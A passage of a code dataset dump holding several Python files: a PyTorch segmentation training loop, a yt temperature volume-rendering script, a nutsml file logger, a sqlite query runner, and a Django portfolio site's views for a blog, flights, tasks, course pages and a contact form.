opt.f_maps)\n\nL1loss_function = torch.nn.L1Loss()\nL2loss_function = torch.nn.MSELoss()\nBCEloss_function = torch.nn.BCELoss()\nif torch.cuda.is_available():\n print('Using GPU.')\n net_seg.cuda()\n L1loss_function.cuda()\n L2loss_function.cuda()\n BCEloss_function.cuda()\n\n\noptimizer_seg = torch.optim.Adam(net_seg.parameters(), lr=opt.lr, betas=(opt.b1, 0.999))\n########################################################################################################################\n\ntime_start=time.time()\nprev_time = time.time()\n# print('train_im_list key -----> ',train_im_list.keys())\niteration_num = 0\nfor epoch in range(opt.epoch, opt.n_epochs):\n coor_list = shuffle_datasets_lessMemory(coor_list)\n # print('name list -----> ',name_list) \n for index in range(len(coor_list)):\n per_coor = coor_list[index]\n train_im_name = per_coor['name']\n init_w = per_coor['init_w']\n init_h = per_coor['init_h']\n GT_im = GT_list[train_im_name]\n input_im = input_list[train_im_name]\n\n # print('GT_im -----> ',GT_im.shape)\n # print('input_im -----> ',input_im.shape)\n GT_patch = GT_im[:, init_w:init_w+opt.img_w, init_h:init_h+opt.img_h]\n input_patch = input_im[:, init_w:init_w+opt.img_w, init_h:init_h+opt.img_h].copy()\n\n rand_bg = np.random.randint(0, 100)\n rand_gama = np.random.randint(1000, 5000)/1000\n input_patch = (input_patch+rand_bg)/rand_gama\n\n GT_patch = torch.from_numpy(GT_patch.astype(np.float32))\n GT_patch = torch.from_numpy(np.expand_dims(np.expand_dims(GT_patch,0),0)).cuda()\n input_patch = torch.from_numpy(input_patch.astype(np.float32))\n input_patch = torch.from_numpy(np.expand_dims(np.expand_dims(input_patch,0),0)).cuda()\n # print('input_patch -----> ',input_patch.shape)\n # print('GT_patch -----> ',GT_patch.shape)\n GT_patch = FFDrealign4(GT_patch).cuda()\n input_patch = FFDrealign4(input_patch).cuda()\n\n # print('input_patch -----> ',input_patch.shape)\n pred_patch = net_seg(input_patch)\n # print('pred_patch -----> ',pred_patch.shape)\n\n optimizer_seg.zero_grad()\n # L1Loss_A2B = L1loss_function(train_imB, pred_imA)\n BCELoss_B2A_SDNN = BCEloss_function(pred_patch, GT_patch)\n L2Loss_B2A_SDNN = L2loss_function(pred_patch, GT_patch)\n loss_SDNN = BCELoss_B2A_SDNN+L2Loss_B2A_SDNN\n loss_SDNN.backward()\n optimizer_seg.step()\n\n iteration_num = iteration_num +1\n ################################################################################################################\n batches_done = epoch * opt.train_datasets_size + index\n batches_left = opt.n_epochs * opt.train_datasets_size - batches_done\n time_left = datetime.timedelta(seconds=batches_left * (time.time() - prev_time))\n prev_time = time.time()\n ################################################################################################################ 8_HCC20\n if (index%1000 == 0):\n time_end=time.time()\n print('time cost',time_end-time_start,'s')\n sys.stdout.write(\"\\r[Epoch %d/%d] [Batch %d/%d] ETA: %s\"\n % (epoch, opt.n_epochs, index, opt.train_datasets_size, time_left ))\n print(' loss_SDNN ',loss_SDNN.cpu().detach().numpy())\n print('iteration_num ',iteration_num)\n print(GT_patch.cpu().detach().numpy().max(),' ---> ', GT_patch.cpu().detach().numpy().min(),' ---> ',\\\n pred_patch.cpu().detach().numpy().max(),' ---> ', pred_patch.cpu().detach().numpy().min(),' ---> ',\\\n input_patch.cpu().detach().numpy().max(),' ---> ', input_patch.cpu().detach().numpy().min())\n\n # if (index%50 == 0): # or ((epoch+1)%1 == 0):\n if (iteration_num+1)%1000 == 0:\n print('save image')\n train_im_name = per_coor['name']\n input_output_path = output_path + '/input'\n pred_output_path = output_path + '/pred'\n GT_output_path = output_path + '/GT'\n\n if not os.path.exists(input_output_path): \n os.mkdir(input_output_path)\n if not os.path.exists(pred_output_path): \n os.mkdir(pred_output_path)\n if not os.path.exists(GT_output_path): \n os.mkdir(GT_output_path)\n\n input_patch_realign = inv_FFDrealign4(input_patch)\n input_patch_realign = input_patch_realign.cpu().detach().numpy()\n pred_patch_realign = inv_FFDrealign4(pred_patch)\n pred_patch_realign = pred_patch_realign.cpu().detach().numpy()\n GT_patch_realign = inv_FFDrealign4(GT_patch)\n GT_patch_realign = GT_patch_realign.cpu().detach().numpy()\n\n input_patch_realign = input_patch_realign.squeeze().astype(np.float32)*opt.normalize_factor\n pred_patch_realign = pred_patch_realign.squeeze().astype(np.float32)*opt.normalize_factor\n GT_patch_realign = GT_patch_realign.squeeze().astype(np.float32)*opt.normalize_factor\n\n input_patch_realign = np.clip(input_patch_realign, 0, 65535).astype('uint16')\n pred_patch_realign = np.clip(pred_patch_realign, 0, 65535).astype('uint16')\n GT_patch_realign = np.clip(GT_patch_realign, 0, 65535).astype('uint16')\n\n input_name = input_output_path + '/' + str(epoch) + '_' + str(index) + '_' + train_im_name+'_input.tif'\n pred_name = pred_output_path + '/' + str(epoch) + '_' + str(index) + '_' + train_im_name+'_pred.tif'\n GT_name = GT_output_path + '/' + str(epoch) + '_' + str(index) + '_' + train_im_name+'_GT.tif'\n\n io.imsave(input_name, input_patch_realign)\n io.imsave(pred_name, pred_patch_realign)\n io.imsave(GT_name, GT_patch_realign)\n\n if (epoch+1)%1 == 0:\n torch.save(net_seg.state_dict(), pth_folder + '//seg_' + str(epoch) + '.pth')\n\n\n\n\n\n","repo_name":"yuanlong-o/Deep_widefield_cal_inferece","sub_path":"DeepWonder/train_SEG_model.py","file_name":"train_SEG_model.py","file_ext":"py","file_size_in_byte":9758,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"42"} +{"seq_id":"31478300234","text":"#!/usr/bin/env python\nimport matplotlib\nmatplotlib.use('Agg')\nimport os\nimport sys\nimport numpy as np\nimport yt\nyt.enable_parallelism()\n\n#dir = '/home/ychen/data/0only_0529_h1/'\ndir = '/d/d11/ychen/MHD_jet/0517_L45_M10_b1_h1_20Myr'\ntry:\n ind = int(sys.argv[1])\n ts = yt.DatasetSeries(os.path.join(dir,'*_hdf5_plt_cnt_%02d?0' % ind), parallel=10)\nexcept IndexError:\n ts = yt.DatasetSeries(os.path.join(dir,'*_hdf5_plt_cnt_???0'), parallel=10)\n\n\nfiguredir = os.path.join(dir, 'volume_rendering_temperature_clip4')\nannotateddir = os.path.join(figuredir, 'annotated')\ntfdir = os.path.join(figuredir, 'transfer_function')\n\nif yt.is_root():\n for subdir in [figuredir, tfdir, annotateddir]:\n if not os.path.exists(subdir):\n os.mkdir(subdir)\n\n#fname = '/home/ychen/d9/FLASH4/stampede/0529_L45_M10_b1_h1/MHD_Jet_hdf5_plt_cnt_0620'\n#ds = yt.load(fname)\n\nbounds = (2e7, 3e9)\n\n# Since this rendering is done in log space, the transfer function needs\n# to be specified in log space.\ntf = yt.ColorTransferFunction(np.log10(bounds))\n\ntf.sample_colormap(np.log10(2E9), 0.005, alpha=0.1, colormap=\"arbre\")\n#tf.sample_colormap(np.log10(1E9), 0.005, alpha=0.5, colormap=\"arbre\")\n#tf.sample_colormap(np.log10(6E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(7.5E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(2.5E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(1E8), 0.005, alpha=0.1, colormap=\"arbre\")\ntf.sample_colormap(np.log10(3.5E7), 0.005, alpha=0.01, colormap=\"arbre\")\n\nfor ds in ts.piter():\n sc = yt.create_scene(ds, field='temperature', lens_type='plane-parallel')\n\n render_source = sc.get_source(0)\n render_source.transfer_function = tf\n render_source.tfh.tf = tf\n render_source.tfh.bounds = bounds\n\n render_source.tfh.plot(tfdir+'/%s_render_transfer_function.png' % ds.basename,\n profile_field='density')\n\n cam = sc.add_camera(ds, lens_type='plane-parallel')\n cam.resolution = (1920, 1080)\n cam.width = ds.arr([100,56.25,56.25], 'kpc')\n cam.position = ds.arr([50, 0, 0], 'kpc')\n cam.switch_orientation(normal_vector=[-1, 0, 0], north_vector=[0, 1, 0])\n\n sc.render()\n\n\n # save an annotated version of the volume rendering including a representation\n # of the transfer function and a nice label showing the simulation time.\n text_string = \"T = {:6.2f} Myr\".format(float(ds.current_time.to('Myr')))\n #text_kwargs = {'color': 'grey'}\n sc.save_annotated(annotateddir+'/'+ds.basename, sigma_clip=4,\n text_annotate=[[(0.05, 0.9), text_string]])\n\n\n #sc.save(figuredir+'/'+ds.basename, sigma_clip=4.0)\n sc.save(figuredir+'/'+ds.basename, sigma_clip=4)\n\n","repo_name":"yihaochen/FLASHtools","sub_path":"render/yt_render_temperature.py","file_name":"yt_render_temperature.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"74555827005","text":"\"\"\"\n.. module:: logger\n :synopsis: Data logging\n\"\"\"\n\nimport os\nimport numpy as np\nfrom warnings import warn\nfrom nutsflow import NutFunction\nfrom nutsflow.common import as_tuple\n\n\nclass LogToFile(NutFunction):\n \"\"\"\n Log columns of data to file.\n \"\"\"\n\n def __init__(self, filepath, cols=None, colnames=None, reset=True,\n delimiter=','):\n \"\"\"\n Construct logger.\n\n >>> from __future__ import print_function\n >>> from nutsflow import Consume\n >>> filepath = 'tests/data/temp_logfile.csv'\n >>> data = [[1, 2], [3, 4]]\n\n >>> with LogToFile(filepath) as logtofile:\n ... data >> logtofile >> Consume()\n >>> print(open(filepath).read())\n 1,2\n 3,4\n \n\n >>> logtofile = LogToFile(filepath, cols=(1, 0), colnames=['a', 'b'])\n >>> data >> logtofile >> Consume()\n >>> print(open(filepath).read())\n a,b\n 2,1\n 4,3\n \n >>> logtofile.close()\n >>> logtofile.delete()\n\n :param string filepath: Path to file to write log to.\n :param int|tuple|None cols: Indices of columns of input data to write.\n None: write all columns\n int: only write the single given column\n tuple: list of column indices\n :param tuple|None colnames: Column names to write in first line.\n If None no colnames are written.\n :param bool reset: If True the writing to the log file is reset\n if the logger is recreated. Otherwise log data is appended\n to the log file.\n :param str delimiter: Delimiter for columns in log file.\n \"\"\"\n self.cols = cols\n self.reset = reset\n self.delim = delimiter\n self.filepath = filepath\n self.f = open(filepath, 'w' if self.reset else 'a')\n if colnames:\n self._writerow(colnames)\n\n def _writerow(self, row):\n \"\"\"Write row as string to log file and flush\"\"\"\n self.f.write(self.delim.join(map(str, row)))\n self.f.write('\\n')\n self.f.flush()\n\n def __call__(self, x):\n \"\"\"\n Log x\n\n :param any x: Any type of data.\n Special support for numpy arrays.\n :return: Return input unchanged\n :rtype: Same as input\n \"\"\"\n if isinstance(x, np.ndarray):\n row = x.tolist() if x.ndim else [x.item()]\n else:\n row = x\n if not self.cols is None:\n row = [row[i] for i in as_tuple(self.cols)]\n self._writerow(row)\n return x\n\n def delete(self):\n \"\"\"Delete log file\"\"\"\n self.close()\n os.remove(self.filepath)\n\n def close(self):\n \"\"\"Implementation of context manager API\"\"\"\n self.f.close()\n\n def __enter__(self):\n \"\"\"Implementation of context manager API\"\"\"\n\n return self\n\n def __exit__(self, *args):\n \"\"\"Implementation of context manager API\"\"\"\n self.close()\n\n\nclass LogCols(LogToFile):\n def __init__(self, filepath, cols=None, colnames=None, reset=True,\n delimiter=','):\n LogToFile.__init__(self, filepath, cols, colnames, reset, delimiter)\n warn('LogCols is deprecated. Use LogToFile!', DeprecationWarning)\n","repo_name":"maet3608/nuts-ml","sub_path":"nutsml/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"42"} +{"seq_id":"71777279168","text":"# Connect to the database\nimport sqlite3\nconn = sqlite3.connect('student_db.db')\ncursor = conn.cursor()\n\n# Open and read the contents of query_1.sql\nwith open('query_10.sql', 'r') as file:\n sql = file.read()\n\n# Execute the query\ncursor.execute(sql)\n\n# Fetch and print the results\nresults = cursor.fetchall()\nfor row in results:\n print(row)\n\n# Close the connection\nconn.close()","repo_name":"SergiiOshmarin/Web-2.0--Homework-Six","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"43527611933","text":"from django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.urls import reverse\nfrom .forms import *\nfrom .models import *\nfrom django.shortcuts import render\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\n\n\ndef home_base(request):\n return render(request, 'portfolio/base/home_base.html')\n\n\n# Cadeiras-------------------------------------------------\n@login_required\ndef criar_cadeira_educacao(request):\n if request.method == 'POST':\n form = CadeiraForm(request.POST, request.FILES)\n if form.is_valid():\n cadeira = form.save()\n return redirect('portifolio:detalhes_cadeira_educacao', pk=cadeira.pk)\n else:\n form = CadeiraForm()\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/criar_cadeira_educacao.html', {'form': form})\n\n\n@login_required\ndef editar_cadeira_educacao(request, pk):\n cadeira = get_object_or_404(Cadeira, pk=pk)\n if request.method == 'POST':\n form = CadeiraForm(request.POST, instance=cadeira)\n if form.is_valid():\n form.save()\n return redirect('portifolio:detalhes_cadeira_educacao', pk=cadeira.pk)\n else:\n form = CadeiraForm(instance=cadeira)\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/editar_cadeira_educacao.html',\n {'form': form, 'cadeira': cadeira})\n\n\n@login_required\ndef apagar_cadeira_educacao(request, pk):\n cadeira = get_object_or_404(Cadeira, pk=pk)\n if request.method == 'POST':\n cadeira.delete()\n return redirect('portifolio:home_educacao')\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/apagar_cadeira_educacao.html',\n {'cadeira': cadeira})\n\n\ndef detalhes_cadeira_educacao(request, pk):\n cadeira = get_object_or_404(Cadeira, pk=pk)\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/detalhes_cadeira_educacao.html',\n {'cadeira': cadeira})\n\n\n# Educação-------------------------------------------------\ndef home_educacao(request):\n cadeiras = Cadeira.objects.all()\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/home_educacao.html', {'cadeiras': cadeiras})\n\n\ndef login_educacao(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:home_educacao')\n else:\n # aqui\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/login_educacao.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/sobreMim/sobreMim_educacao_folder/login_educacao.html')\n\n\ndef logout_educacao(request):\n logout(request)\n return redirect('portifolio:home_educacao')\n\n\n# Tarefas----------------------------------------------------\ndef home_tarefa(request):\n topicos = ['HTML', 'Java', 'Kotlin', 'Python', 'Django', 'JavaScript', 'CSS']\n\n context = {\n 'topicos': topicos,\n 'tarefas': Tarefa.objects.all()\n }\n\n return render(request, 'portfolio/tarefas/home_tarefa.html', context)\n\n\ndef nova_tarefa(request):\n form = TarefaForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('portifolio:nova_tarefa')\n\n context = {'form': form}\n\n return render(request, 'portfolio/tarefas/nova_tarefa.html', context)\n\n\ndef edita_tarefa(request, tarefa_id):\n tarefa = Tarefa.objects.get(id=tarefa_id)\n form = TarefaForm(request.POST or None, instance=tarefa)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portifolio:edita_tarefa', args=[tarefa_id]))\n\n context = {'form': form, 'tarefa_id': tarefa_id}\n return render(request, 'portfolio/tarefas/edita_tarefa.html', context)\n\n\ndef apaga_tarefa(request, tarefa_id):\n Tarefa.objects.get(id=tarefa_id).delete()\n return HttpResponseRedirect(reverse('portifolio:home_tarefa'))\n\n\n# Flight-------------------------------------------------\ndef flights_view(request):\n print(request.user.username)\n\n context = {\n 'flights': Flight.objects.all().order_by('origin')\n }\n return render(request, 'portfolio/flights/flights_view.html', context)\n\n\ndef flight_view(request, flight_id):\n flight = Flight.objects.get(id=flight_id)\n context = {\n 'flight': flight,\n 'passengers': flight.passengers.all(),\n 'no_passengers': Passenger.objects.exclude(flights__in=[flight])\n }\n\n return render(request, 'portfolio/flights/flight_view.html', context)\n\n\ndef passengers_view(request):\n form = PassengerForm(request.POST or None)\n if form.is_valid():\n form.save()\n\n context = {\n 'passengers': Passenger.objects.all().order_by('name'),\n 'form': PassengerForm(None),\n }\n return render(request, 'portfolio/flights/passengers_view.html', context)\n\n\ndef passenger_view(request, passenger_id):\n passenger = Passenger.objects.get(id=passenger_id)\n\n form = FlightForm(request.POST or None, instance=passenger)\n if form.is_valid():\n form.save()\n\n context = {\n 'passenger': passenger,\n 'form': form,\n }\n\n return render(request, 'portfolio/flights/passenger_view.html', context)\n\n\n@login_required\ndef add_passenger_view(request, flight_id):\n flight = Flight.objects.get(id=flight_id)\n\n if request.method == 'POST':\n passenger = Passenger.objects.get(id=request.POST['passenger'])\n flight.passengers.add(passenger)\n\n return redirect('portifolio:flight', flight_id=flight_id)\n\n\n@login_required\ndef remove_passenger_view(request, flight_id, passenger_id):\n flight = Flight.objects.get(id=flight_id)\n passenger = Passenger.objects.get(id=passenger_id)\n\n flight.passengers.remove(passenger)\n\n return redirect('portifolio:flights', flight_id=flight_id)\n\n\ndef login_flight(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:flights')\n else:\n return render(request, 'portfolio/flights/login_flight.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/flights/login_flight.html')\n\n\ndef logout_flight(request):\n logout(request)\n return redirect('portifolio:flights')\n\n\n# Sobre mim---------------------------------------------\ndef sobreMim_full(request):\n return render(request, 'portfolio/sobreMim/sobreMim_full.html')\n\n\ndef sobreMim_video(request):\n return render(request, 'portfolio/sobreMim/sobreMim_licencituras_folder/sobreMim_video.html')\n\n\ndef novo_sobreMim(request):\n form = SobreMimForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('portifolio:novo_sobreMim')\n\n context = {'form': form}\n\n return render(request, 'portfolio/sobreMim/sobreMim_licencituras_folder/sobreMim_nova_2.html', context)\n\n\ndef edita_sobreMim(request, sobreMim_id):\n sobreMim = SobreMim.objects.get(id=sobreMim_id)\n form = SobreMimForm(request.POST or None, instance=sobreMim)\n\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('portifolio:edita_sobreMim', args=[sobreMim_id]))\n\n context = {'form': form, 'sobreMim_id': sobreMim_id}\n return render(request, 'portfolio/sobreMim/sobreMim_licencituras_folder/sobreMim_edita_2.html', context)\n\n\ndef apaga_sobreMim(request, sobreMim_id):\n SobreMim.objects.get(id=sobreMim_id).delete()\n return HttpResponseRedirect(reverse('portifolio:sobreMim_educacao'))\n\n\n# Blog-------------------------------------------\n@login_required\ndef add_categoria_blog(request):\n if request.method == 'POST':\n form = CategoriaForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = CategoriaForm()\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/add_categoria_blog.html', context)\n\n\n@login_required\ndef add_artigo_blog(request):\n if request.method == 'POST':\n form = ArtigoForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = ArtigoForm()\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/add_artigo_blog.html', context)\n\n\n@login_required\ndef editar_categoria_blog(request, categoria_id):\n categoria = get_object_or_404(Categoria, id=categoria_id)\n if request.method == 'POST':\n form = CategoriaForm(request.POST, request.FILES, instance=categoria)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = CategoriaForm(instance=categoria)\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/editar_categoria_blog.html', context)\n\n\n@login_required\ndef editar_artigo_blog(request, artigo_id):\n artigo = get_object_or_404(Artigo, id=artigo_id)\n if request.method == 'POST':\n form = ArtigoForm(request.POST, request.FILES, instance=artigo)\n if form.is_valid():\n form.save()\n return redirect('portifolio:home_blog_full')\n else:\n form = ArtigoForm(instance=artigo)\n context = {\n 'form': form\n }\n return render(request, 'portfolio/blog/blog_template_folder/editar_artigo_blog.html', context)\n\n\n@login_required\ndef apagar_categoria_blog(request, categoria_id):\n categoria = get_object_or_404(Categoria, id=categoria_id)\n if request.method == 'POST':\n categoria.delete()\n return redirect('portifolio:home_blog_full')\n context = {\n 'categoria': categoria\n }\n return render(request, 'portfolio/blog/blog_template_folder/apagar_categoria_blog.html', context)\n\n\n@login_required\ndef apagar_artigo_blog(request, artigo_id):\n artigo = get_object_or_404(Artigo, id=artigo_id)\n if request.method == 'POST':\n artigo.delete()\n return redirect('portifolio:home_blog_full')\n context = {\n 'artigo': artigo\n }\n return render(request, 'portfolio/blog/blog_template_folder/apagar_artigo_blog.html', context)\n\n\ndef categorias_blog(request):\n categorias = Categoria.objects.all()\n context = {\n 'categorias': categorias\n }\n return render(request, 'portfolio/blog/blog_template_folder/categorias_blog.html', context)\n\n\ndef categoria_blog(request, categoria_id):\n categoria = get_object_or_404(Categoria, id=categoria_id)\n artigos = categoria.artigos.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n\n context = {\n 'categoria': categoria,\n 'artigos': artigos,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n\n }\n return render(request, 'portfolio/blog/blog_template_folder/categoria_blog.html', context)\n\n\ndef artigos_blog(request):\n categorias = Categoria.objects.all()\n artigos = Artigo.objects.all()\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos': artigos,\n 'autores': autores\n }\n return render(request, 'portfolio/blog/blog_template_folder/artigos_blog.html', context)\n\n\ndef artigo_blog(request, artigo_id):\n artigo = get_object_or_404(Artigo, id=artigo_id)\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores,\n 'artigo': artigo\n }\n return render(request, 'portfolio/blog/blog_template_folder/artigo_blog.html', context)\n\n\ndef home_blog_full(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request, 'portfolio/blog/blog_template_folder/home_blog_full.html', context)\n\n\ndef login_blog(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:home_blog_full')\n else:\n # aqui\n return render(request, 'portfolio/blog/blog_template_folder/login_blog.html', {\n 'message': 'Credenciais invalidas'\n })\n return render(request, 'portfolio/blog/blog_template_folder/login_blog.html')\n\n\ndef logout_blog(request):\n logout(request)\n return redirect('portifolio:home_blog_full')\n\n\n# Programação Web------------------------------------\ndef web_home_full(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_home_full.html', context)\n\n\ndef web_laboratorios(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/web_laboratorios.html',\n context)\n\n\ndef web_javaScript_playground(request):\n categorias = Categoria.objects.all()\n artigos_destaque = Artigo.objects.filter(destaque=True)\n autores = Autor.objects.all()\n context = {\n 'categorias': categorias,\n 'artigos_destaque': artigos_destaque,\n 'autores': autores\n }\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_javaScript_playground.html', context)\n\n\ndef web_scrapping(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_scrapping.html')\n\n\ndef index_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/index.html')\n\n\ndef info_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/info.html')\n\n\ndef local_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/local.html')\n\n\ndef multimidia_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/multimedia.html')\n\n\ndef quizz_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/quizz.html')\n\n\ndef html_css_lab_1(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab1/html5-css.html')\n\n\ndef index_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/indexNovo.html')\n\n\ndef sec2_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec2.html')\n\n\ndef sec3_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec3.html')\n\n\ndef sec4_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec4.html')\n\n\ndef sec5_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec5.html')\n\n\ndef sec6_lab_3(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab3/sec6.html')\n\n\ndef index_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/indexNovo2.html')\n\n\ndef animacoes_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/animacoes.html')\n\n\ndef imagensResponsivas_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/ImagensResponsivas.html')\n\n\ndef paralax_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/paralax.html')\n\n\ndef sec2_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec2.html')\n\n\ndef sec3_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec3.html')\n\n\ndef sec4_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec4.html')\n\n\ndef sec5_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec5.html')\n\n\ndef sec6_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/sec6.html')\n\n\ndef svg_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/svg.html')\n\n\ndef videoBackground_lab_4(request):\n return render(request,\n 'portfolio/sobreMim/web_laboratorios_folder/lab4/videoBackground.html')\n\n\ndef web_calculator(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_calculator.html')\n\n\ndef web_tecnologias_existentes(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_tecnologias_existentes.html')\n\n\ndef web_video_tecnico(request):\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/web_video_tecnico.html')\n\n\ndef scraping_previsao_tempo(request):\n url = \"https://www.amazon.com/Sony-Playstation-VR-Marvels-Bundle/dp/B0B2WDLQQP/ref=pd_vtp_h_pd_vtp_h_sccl_3/137\" \\\n \"-0687099-4683901?pd_rd_w=o5N1a&content-id=amzn1.sym.e16c7d1a-0497-4008-b7be-636e59b1dfaf&pf_rd_p=e16c7d1a\" \\\n \"-0497-4008-b7be-636e59b1dfaf&pf_rd_r=YGYYMGMEE008NDP7NAR0&pd_rd_wg=8WZL2&pd_rd_r=93cc9a11-9c74-499a-8f26\" \\\n \"-9d4ed6268991&pd_rd_i=B0B2WDLQQP&psc=1\"\n\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/114.0.0.0 Safari/537.36\",\n \"Accept-Language\": \"en\",\n }\n r = requests.get(url, headers=headers)\n soup = BeautifulSoup(r.text, \"lxml\")\n\n name = soup.select_one(selector=\"#productTitle\").getText()\n name = name.strip()\n print(name)\n\n price = soup.select_one(selector=\"#price_inside_buybox\").getText()\n\n print(price)\n\n context = {\n 'name': name,\n 'price': price\n }\n\n # Renderize o template HTML com os dados obtidos\n return render(request, 'portfolio/sobreMim/sobreMim_programacao_web_folder/scraping_previsao_tempo.html', context)\n\n\n# Formulário de contacto---------------------------------\ndef contacto_full(request):\n if request.method == 'POST':\n form = ContatoForm(request.POST)\n if form.is_valid():\n nome = form.cleaned_data['nome']\n email = form.cleaned_data['email']\n telefone = form.cleaned_data['telefone']\n assunto = form.cleaned_data['assunto']\n mensagem = form.cleaned_data['mensagem']\n contato = Contato(nome=nome, email=email, telefone=telefone, assunto=assunto, mensagem=mensagem)\n contato.save()\n\n return render(request, 'portfolio/contacto/contacto_sucesso.html')\n else:\n form = ContatoForm()\n\n return render(request, 'portfolio/contacto/contacto_full.html', {'form': form})\n\n\ndef contacto_sucesso(request):\n return render(request, 'portfolio/contacto/contacto_sucesso.html')\n\n\ndef login_contacto(request):\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(request,\n username=username,\n password=password)\n\n if user is not None:\n login(request, user)\n return redirect('portifolio:contacto_full')\n else:\n # aqui\n return render(request, 